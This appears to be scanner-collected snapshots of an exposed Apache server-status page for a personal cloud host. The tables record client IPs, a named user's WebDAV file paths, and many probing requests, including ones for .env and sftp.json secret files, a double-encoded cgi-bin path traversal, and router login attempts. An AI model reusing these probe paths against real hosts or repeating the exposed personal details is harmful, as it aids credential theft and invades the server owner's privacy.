Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Tuesday, 15-Oct-2024 22:48:43 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 329 Parent Server MPM Generation: 328 Server uptime: 326 days 15 hours 49 minutes 3 seconds Server load: 0.00 0.00 0.00 Total accesses: 565512 - Total Traffic: 62.1 GB - Total Duration: 79633306 CPU Usage: u933.69 s1833.39 cu6047.32 cs1689.24 - .0372% CPU load .02 requests/sec - 2363 B/second - 115.2 kB/request - 140.816 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02647644no0yes025000 12647645no0yes124000 Sum200 149000 ____________________________W_____________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32826476440/7/5729_ 1.87181658881500.00.03106.64 198.235.24.20http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32826476440/7/5674_ 1.9802588269840.00.1383.69 185.242.226.117http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32826476440/7/5798_ 2.1301618662710.00.1094.73 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-32826476440/7/5699_ 2.1011618563700.00.09101.86 165.227.173.41http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32826476440/8/5777_ 1.93108772070.00.09105.44 165.227.173.41http/1.1 0-32826476440/5/5820_ 1.84138798340.00.05124.06 165.227.173.41http/1.1 0-32826476440/7/5751_ 2.1211688554920.00.0876.33 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-32826476440/8/5747_ 1.84108517620.00.0699.19 165.227.127.206http/1.1localhost:80GET /app/config/parameters.yml HTTP/1.1 0-32826476440/9/5671_ 2.1301648663320.00.0990.82 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-32826476440/4/5762_ 2.150909080730.00.03173.55 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-32826476440/7/5756_ 1.98018543950.00.0280.08 205.210.31.196http/1.1localhost:80\x16\x03\x01 0-32826476440/9/5691_ 2.1601238538010.00.0571.78 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-32826476440/9/5793_ 2.140908932330.00.1195.23 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-32826476440/6/5746_ 1.491748777320.00.0585.42 165.227.127.206http/1.1 0-32826476440/6/5793_ 1.881728706800.00.0658.04 125.25.155.110http/1.1localhost:80GET / HTTP/1.0 0-32826476440/8/5841_ 2.0022209168690.00.0896.62 165.227.173.41http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32826476440/7/5736_ 1.93108827980.00.05130.09 165.227.173.41h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32826476440/4/5669_ 1.9312408644010.00.04117.07 165.227.173.41http/1.1 0-32826476440/3/5721_ 1.84108377720.00.0290.35 165.227.173.41h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32826476440/4/5655_ 1.2712808844530.00.0389.11 165.227.173.41h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32826476440/4/5658_ 1.27138353910.00.0265.38 165.227.173.41http/1.1 0-32826476440/7/5676_ 1.9112938775650.00.0670.96 165.227.173.41http/1.1 0-32826476440/5/5568_ 1.88218309220.00.0378.74 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 0-32826476440/6/5702_ 1.50128725670.00.0692.39 165.227.173.41h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32826476440/7/5685_ 1.8911188757020.00.08116.63 165.227.173.41h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32826476450/2/8353_ 0.74183909820780.00.011826.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-32826476450/2/8248_ 0.73212327710063210.00.031180.24 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-32826476450/3/7192_ 0.8818391919342780.00.031542.61 5.196.102.76http/1.1ravignon.mycloud.paris:443GET /favicon.ico HTTP/1.1 1-32826476451/2/7888W 0.50009707350.00.001703.86 165.227.173.41http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-32826476450/3/7236_ 0.741752509813270.00.001291.15 5.181.190.29http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-32826476450/1/9233_ 0.031752009872980.00.001499.93 54.37.79.75http/1.1 1-32826476450/1/7488_ 0.741659929594020.00.011650.63 220.132.19.67http/1.1localhost:80GET / HTTP/1.0 1-32826476450/2/9697_ 0.231435719724130.00.021823.69 143.198.30.131http/1.1 1-32826476450/2/7728_ 0.661659909543200.00.001351.38 167.94.138.34http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-32826476450/3/8160_ 0.75136841219929510.00.041687.71 103.203.59.1http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32826476450/1/8208_ 0.25136832249406080.00.021958.90 184.105.247.196h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32826476450/1/7695_ 0.071269829917690.00.004063.71 165.232.138.158h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32826476450/3/7355_ 0.671269819868540.00.052087.35 165.232.138.158http/1.1 1-32826476450/2/9114_ 0.781195629571410.00.031622.50 49.213.135.117http/1.1localhost:80GET / HTTP/1.0 1-32826476450/3/7108_ 0.531195619753910.00.061162.29 185.234.216.88http/1.1 1-32826476450/3/7887_ 0.83302019645300.00.021367.88 83.97.73.245http/1.1localhost:80GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 1-32826476450/3/7983_ 0.53744809886190.00.041841.88 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-32826476450/4/7014_ 0.83575519421010.00.052004.90 111.253.220.41http/1.1localhost:80GET / HTTP/1.0 1-32826476450/2/7413_ 0.8267441539360030.00.042347.90 213.32.39.39http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32826476450/3/7069_ 0.80744916512366860.00.031961.86 178.32.170.30http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32826476450/2/8053_ 0.47521739586380.00.011901.08 54.37.79.75http/1.1 1-32826476450/1/7121_ 0.14575429766870.00.003153.88 54.37.79.75http/1.1 1-32826476450/2/7352_ 0.70301609745990.00.003640.99 13.91.50.116http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-32826476450/1/7286_ 0.84212429850840.00.011235.05 223.206.57.108http/1.1localhost:80GET / HTTP/1.0 1-32826476450/4/7104_ 0.83521709482040.00.021606.81 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 2-321-0/0/2598. 0.0060052003422650.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbbedcd810
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 13-Oct-2024 21:28:02 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 327 Parent Server MPM Generation: 326 Server uptime: 324 days 14 hours 28 minutes 23 seconds Server load: 0.08 0.02 0.01 Total accesses: 564750 - Total Traffic: 62.1 GB - Total Duration: 79593224 CPU Usage: u927.86 s1820.91 cu6040.62 cs1686.95 - .0374% CPU load .0201 requests/sec - 2378 B/second - 115.3 kB/request - 140.935 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02639274no0yes025000 12639275no0yes124000 Sum200 149000 ___________________________________________W______.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32626392740/5/5718_ 0.8927322128879760.00.02106.59 198.235.24.183http/1.1localhost:80\x16\x03\x01 0-32626392740/6/5661_ 0.744475948249920.00.0283.49 54.37.79.75http/1.1 0-32626392740/6/5786_ 0.89447538655660.00.0494.62 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 0-32626392740/7/5687_ 0.74652108555100.00.02101.74 172.169.5.242http/1.1 0-32626392740/4/5760_ 0.7527311468767130.00.03105.33 35.226.250.46http/1.1ravignon.mycloud.paris:443GET /app/ HTTP/1.1 0-32626392740/5/5808_ 0.879663798786780.00.03123.94 80.82.70.133http/1.1localhost:80\x16\x03\x02\x01o\x01 0-32626392740/5/5738_ 0.619657558548030.00.0476.23 54.37.79.75http/1.1 0-32626392740/5/5734_ 0.791102218510440.00.0199.08 198.235.24.194http/1.1 0-32626392740/5/5653_ 0.781269518651590.00.0190.66 165.154.129.188http/1.1ravignon.mycloud.paris:443GET /core/img/favicon.ico HTTP/1.1 0-32626392740/4/5752_ 0.45119079700.00.07173.50 167.99.210.137h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32626392740/4/5744_ 0.9401728539230.00.0380.02 167.99.210.137http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-32626392740/3/5677_ 0.511406848533340.00.0071.70 78.153.140.223http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-32626392740/7/5778_ 0.8874761428918890.00.0695.08 185.242.226.117http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32626392740/6/5736_ 0.9501278771440.00.0385.33 167.99.210.137http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-32626392740/5/5779_ 0.75194238701260.00.0257.94 202.184.97.236http/1.1 0-32626392740/4/5829_ 0.82747629164640.00.0396.54 165.154.129.188http/1.1ravignon.mycloud.paris:443GET /core/js/backgroundjobs.js?v=ccbf35ac-1 HTTP/1.1 0-32626392740/6/5722_ 0.861407318816290.00.05129.96 185.224.128.47http/1.1localhost:80GET / HTTP/1.1 0-32626392740/4/5660_ 0.7611218641550.00.02117.02 167.99.210.137http/1.1 0-32626392740/0/5713_ 0.00008375540.00.0090.31 202.112.238.240http/1.1 0-32626392740/7/5645_ 0.89447518841670.00.0789.07 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-32626392740/3/5650_ 0.534475608349550.00.0265.34 54.37.79.75http/1.1 0-32626392740/5/5663_ 0.441928767850.00.0370.86 162.142.125.36http/1.1 0-32626392740/2/5556_ 0.6811388304200.00.0278.67 167.99.210.137h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32626392740/3/5692_ 0.8512108716730.00.0692.30 167.99.210.137http/1.1 0-32626392740/3/5674_ 0.86126951368747860.00.02116.55 91.238.181.22http/1.1localhost:80\x03 1-32626392750/11/8330_ 2.663702599807420.00.041826.67 162.142.125.36http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32626392750/11/8235_ 2.641798110055310.00.131180.15 52.76.71.100http/1.1ravignon.mycloud.paris:443GET /core/img/favicon.ico HTTP/1.1 1-32626392750/13/7172_ 2.8412059332160.02.981542.43 167.99.210.137http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32626392750/15/7867_ 2.813702369696120.00.131703.74 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-32626392750/12/7213_ 2.67370859812330.00.051291.07 162.142.125.36http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32626392750/12/9218_ 2.75119871100.00.091499.91 167.99.210.137h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32626392750/7/7471_ 1.87149586470.00.021650.53 162.142.125.36h2ravignon.mycloud.paris:443[0/0] init 1-32626392750/9/9683_ 2.75129718020.00.101823.60 167.99.210.137h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32626392750/10/7711_ 1.76109535130.00.061351.25 167.99.210.137http/1.1 1-32626392750/12/8141_ 1.87109918020.00.061687.56 167.99.210.137http/1.1 1-32626392750/6/8189_ 1.55009386780.00.031958.68 152.32.143.189h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32626392750/5/7678_ 1.77129913250.00.034063.61 167.99.210.137h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32626392750/11/7333_ 2.69139856700.00.052087.13 167.99.210.137http/1.1 1-32626392750/14/9097_ 1.95252219565730.00.051622.37 54.37.79.75http/1.1 1-32626392750/13/7086_ 2.9011469745050.00.081162.07 167.99.210.137http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32626392750/15/7865_ 1.79119631520.00.131367.77 165.154.129.188http/1.1 1-32626392750/11/7966_ 2.9111449874080.00.051841.74 167.99.210.137http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-32626392750/12/6994_ 2.9201419415330.00.142004.79 167.99.210.137http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-32626392751/11/7394W 2.72009347850.00.072347.77 167.99.210.137http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-32626392750/10/7048_ 2.93013912360630.00.081961.75 167.99.210.137http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-32626392750/15/8038_ 2.9401359578960.00.081900.98 167.99.210.137http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-32626392750/10/7106_ 1.8427312449762030.00.053153.81 54.37.79.75http/1.1 1-32626392750/19/7332_ 2.823701569734330.00.143640.85 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-32626392750/8/7268_ 2.79252709834300.00.051234.85 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-32626392750/11/7091_ 2.79179929474340.00.091606.74 49.51.243.156http/1.1localhost:80GET / HTTP/1.1 2-321-0/0/2598. 0.0042288003422650.00.0051.55 185.234.216.88http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb3e3d0c75
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 11-Oct-2024 21:07:23 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 325 Parent Server MPM Generation: 324 Server uptime: 322 days 14 hours 7 minutes 44 seconds Server load: 0.01 0.00 0.00 Total accesses: 563695 - Total Traffic: 62.1 GB - Total Duration: 79545186 CPU Usage: u921.43 s1810.22 cu6034.21 cs1684.22 - .0375% CPU load .0202 requests/sec - 2392 B/second - 115.5 kB/request - 141.114 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02630910no0yes025000 12630911no0yes124000 Sum200 149000 _____________________________W____________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32426309100/8/5705_ 0.9380708875450.00.04106.53 54.37.79.75http/1.1 0-32426309100/6/5650_ 1.1001408246510.00.0783.46 139.59.132.8http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-32426309100/8/5773_ 1.1001968650480.00.0694.52 139.59.132.8http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-32426309100/7/5674_ 1.001253008553690.00.06101.69 45.130.145.209h2ravignon.mycloud.paris:443GET /+CSCOE+/logon.html HTTP/2.0 0-32426309100/5/5748_ 0.89008760650.00.05105.27 154.212.141.167http/1.1 0-32426309100/4/5797_ 0.891253008785270.00.01123.87 172.105.246.139http/1.1localhost:80GET /menu.pl HTTP/1.1 0-32426309100/7/5725_ 0.941156808542350.00.0276.15 54.37.79.75http/1.1 0-32426309100/4/5720_ 0.901023508507180.00.0399.03 48.217.211.243http/1.1 0-32426309100/6/5641_ 1.0480708647560.00.0690.61 8.216.86.85http/1.1ravignon.mycloud.paris:443POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 0-32426309100/3/5743_ 0.91878609076690.00.00173.40 172.105.246.139http/1.1localhost:80GET /localstart.html HTTP/1.1 0-32426309100/7/5733_ 0.94651408534820.00.0579.96 176.34.140.151http/1.1 0-32426309100/5/5667_ 1.0622668532420.00.0271.66 139.59.132.8http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32426309100/7/5765_ 1.03105118913810.00.0194.98 95.214.54.53http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-32426309100/5/5723_ 0.91519608766020.00.0185.27 172.105.246.139http/1.1localhost:80GET /indice.shtml HTTP/1.1 0-32426309100/7/5766_ 1.02519608687630.00.0557.83 80.82.77.202http/1.1localhost:80\x16\x03\x02\x01o\x01 0-32426309100/4/5820_ 0.89105109160020.00.0196.47 95.214.54.53http/1.1 0-32426309100/4/5707_ 0.89178815140.00.04129.86 139.59.132.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-32426309100/3/5648_ 0.91576608639840.00.00116.99 117.80.17.85http/1.1 0-32426309100/8/5709_ 0.96228371950.00.0390.28 52.228.154.181http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-32426309100/7/5628_ 1.01878628834100.00.0388.94 213.32.122.81http/1.1localhost:80GET / HTTP/1.1 0-32426309100/5/5641_ 0.941253008347640.00.0465.29 45.130.145.209h2ravignon.mycloud.paris:443[1/1] done 0-32426309100/5/5651_ 1.0811658766590.00.0570.79 139.59.132.8http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32426309100/4/5549_ 0.97108302150.00.0278.62 139.59.132.8http/1.1 0-32426309100/6/5681_ 1.001156828711540.00.0792.21 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 0-32426309100/6/5667_ 0.98128744910.00.01116.50 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-32426309110/6/8303_ 1.9178719802630.00.011826.57 178.211.139.188http/1.1localhost:80GET / HTTP/1.1 1-32426309110/7/8204_ 1.60782010048060.00.121179.93 117.80.17.85http/1.1 1-32426309110/9/7136_ 2.0701309314670.00.061539.31 139.59.132.8http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-32426309110/15/7832_ 1.946062059683800.00.051703.52 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-32426309111/10/7182W 1.80009799980.00.081290.91 139.59.132.8http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-32426309110/11/9188_ 2.0701419861890.00.051499.76 139.59.132.8http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-32426309110/14/7437_ 1.7178209572470.00.111650.32 117.80.17.85http/1.1 1-32426309110/6/9656_ 1.5960509705560.00.011823.38 172.105.246.139http/1.1localhost:80GET /main.jsp HTTP/1.1 1-32426309110/16/7684_ 1.86229524610.00.081351.06 139.59.132.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32426309110/9/8103_ 1.7902729910910.00.071687.44 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-32426309110/9/8166_ 1.5965109378430.00.071958.54 45.130.145.209h2ravignon.mycloud.paris:443[1/1] done 1-32426309110/7/7660_ 1.5960509910220.00.024063.53 52.183.224.109http/1.1 1-32426309110/6/7302_ 1.59209848730.00.012086.96 139.59.132.8http/1.1 1-32426309110/11/9063_ 1.6248719553980.00.101622.17 54.37.79.75http/1.1 1-32426309110/13/7056_ 1.936512209734110.00.081161.89 172.206.140.252http/1.1ravignon.mycloud.paris:443GET /actuator/health HTTP/1.1 1-32426309110/14/7829_ 1.966051509615430.00.101367.53 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-32426309110/12/7939_ 1.9749219863830.00.111841.59 185.224.128.47http/1.1localhost:80GET / HTTP/1.1 1-32426309110/11/6960_ 2.0611649401620.00.062004.56 139.59.132.8http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-32426309110/7/7362_ 1.59209332780.00.022347.60 139.59.132.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32426309110/12/7018_ 1.872112353750.00.141961.64 139.59.132.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32426309110/11/7998_ 1.8711719457750.00.061900.83 139.59.132.8http/1.1 1-32426309110/8/7082_ 1.77119746010.00.043153.60 139.59.132.8http/1.1 1-32426309110/11/7296_ 1.67149718570.00.063640.58 139.59.132.8h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32426309110/7/7241_ 1.89119830230.00.011234.74 139.59.132.8http/1.1 1-32426309110/10/7058_ 2.0901379462310.00.041606.50 139.59.132.8http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-321-0/0/2598. 0.0024884003422650.00.0051.55 185.234.216.88http/1.1 2-321-0/0/2564. 0.002
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb3fadd3d4
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 09-Oct-2024 21:34:11 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 323 Parent Server MPM Generation: 322 Server uptime: 320 days 14 hours 34 minutes 32 seconds Server load: 0.08 0.02 0.01 Total accesses: 562461 - Total Traffic: 62.1 GB - Total Duration: 79498594 CPU Usage: u926.26 s1803 cu6016.76 cs1677.41 - .0376% CPU load .0203 requests/sec - 2407 B/second - 115.8 kB/request - 141.341 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02622241no0yes025000 12622242no0yes124000 Sum200 149000 __________________________________________W_______.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32226222410/11/5685_ 4.03517208868620.00.10106.43 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 0-32226222410/25/5638_ 4.42823728237600.00.0783.39 89.95.112.211h2ravignon.mycloud.paris:443[1/1] done: stream 1, PROPFIND /remote.php/dav/files/Beatrice%2 0-32226222410/33/5756_ 5.0248808645090.00.1294.41 191.101.217.43http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-32226222410/25/5660_ 5.00905618547240.00.07101.62 81.99.246.100http/1.1localhost:80GET / HTTP/1.0 0-32226222410/20/5736_ 5.01517718752410.00.09105.17 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-32226222410/17/5784_ 5.0182371138781540.00.05123.83 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-32226222410/22/5712_ 4.96108540710.00.0976.12 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-32226222410/26/5709_ 4.971382508499710.00.1098.94 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-32226222410/20/5629_ 4.9451721558641620.00.0690.52 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-32226222410/24/5732_ 4.8048839076510.00.07173.37 89.95.112.211h2ravignon.mycloud.paris:443[1/1] done: stream 1, PROPFIND /remote.php/dav/files/Beatrice%2 0-32226222410/24/5712_ 5.034872118524910.00.0679.83 191.101.217.43http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-32226222410/18/5652_ 4.5448708418680.00.0571.60 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 0-32226222410/22/5748_ 5.0411218913600.00.1194.94 206.81.24.74http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-32226222410/17/5712_ 4.75138201298765940.00.0785.24 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-32226222410/18/5752_ 4.971254008684850.00.0757.75 117.245.5.227http/1.1localhost:80GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0 0-32226222410/23/5798_ 4.551382009154100.00.1096.38 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 0-32226222410/21/5692_ 4.911085008813160.00.07129.81 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-32226222410/22/5637_ 4.981085538636880.00.05116.92 185.242.226.115http/1.1localhost:80GET / HTTP/1.1 0-32226222410/22/5688_ 4.711254008367850.00.0590.22 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 0-32226222410/24/5614_ 4.631085018831670.00.0488.85 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 0-32226222410/17/5627_ 4.981024318345690.00.0465.24 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-32226222410/17/5634_ 4.991000038762000.00.0670.71 43.163.1.85http/1.1localhost:80GET / HTTP/1.1 0-32226222410/22/5538_ 4.92100001348300860.00.0778.58 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-32226222410/29/5668_ 4.711024308705030.00.0692.12 54.36.115.221http/1.1 0-32226222410/22/5656_ 4.93924408744870.00.05116.49 45.140.17.52http/1.1 1-32226222420/38/8274_ 12.3812679793920.00.111826.42 206.81.24.74http/1.1 1-32226222420/42/8178_ 12.3281716110038700.00.171179.71 45.140.17.52http/1.1localhost:80\x03 1-32226222420/42/7100_ 12.34109306540.00.141539.13 206.81.24.74h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32226222420/73/7787_ 12.471699674560.00.281703.33 206.81.24.74http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32226222420/53/7149_ 12.3911489792710.00.171290.75 135.125.244.52http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-32226222420/58/9155_ 12.2911679848800.00.131499.57 206.81.24.74http/1.1 1-32226222420/40/7400_ 12.351749561780.00.151650.12 206.81.24.74http/1.1 1-32226222420/57/9608_ 12.4901339689410.00.141823.14 206.81.24.74http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-32226222420/54/7639_ 12.5101409508300.00.151350.79 206.81.24.74http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-32226222420/42/8065_ 12.18019902480.00.131687.27 141.98.11.15http/1.1 1-32226222420/45/8141_ 12.4701029363840.03.151958.35 206.81.24.74http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-32226222420/49/7627_ 12.5001299904120.00.214063.43 206.81.24.74http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-32226222420/53/7274_ 12.4801399838860.00.162086.80 206.81.24.74http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-32226222420/48/9021_ 12.40019531110.00.121621.93 185.224.128.47http/1.1localhost:80GET / HTTP/1.1 1-32226222420/45/7019_ 12.346091699725510.00.161161.74 4.151.218.179http/1.1ravignon.mycloud.paris:443GET /owa/auth/x.js HTTP/1.1 1-32226222420/46/7791_ 12.1560919599250.00.151367.27 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 1-32226222420/49/7904_ 12.21129851120.00.141841.33 206.81.24.74http/1.1 1-32226222421/56/6930W 12.42009392630.00.182004.40 206.81.24.74http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-32226222420/36/7342_ 12.0811289329810.00.122347.52 206.81.24.74http/1.1 1-32226222420/34/6984_ 12.02113612342190.00.101961.35 206.81.24.74h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32226222420/40/7963_ 12.4261419451870.00.111900.69 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-32226222420/41/7049_ 12.35149741250.00.163153.39 206.81.24.74h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32226222420/52/7261_ 12.34109708800.00.173640.43 206.81.24.74h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32226222420/54/7207_ 12.2611639824930.00.141234.65 206.81.24.74h2ravignon.mycloud.paris:443[0/0] Software caused con
Severity: medium
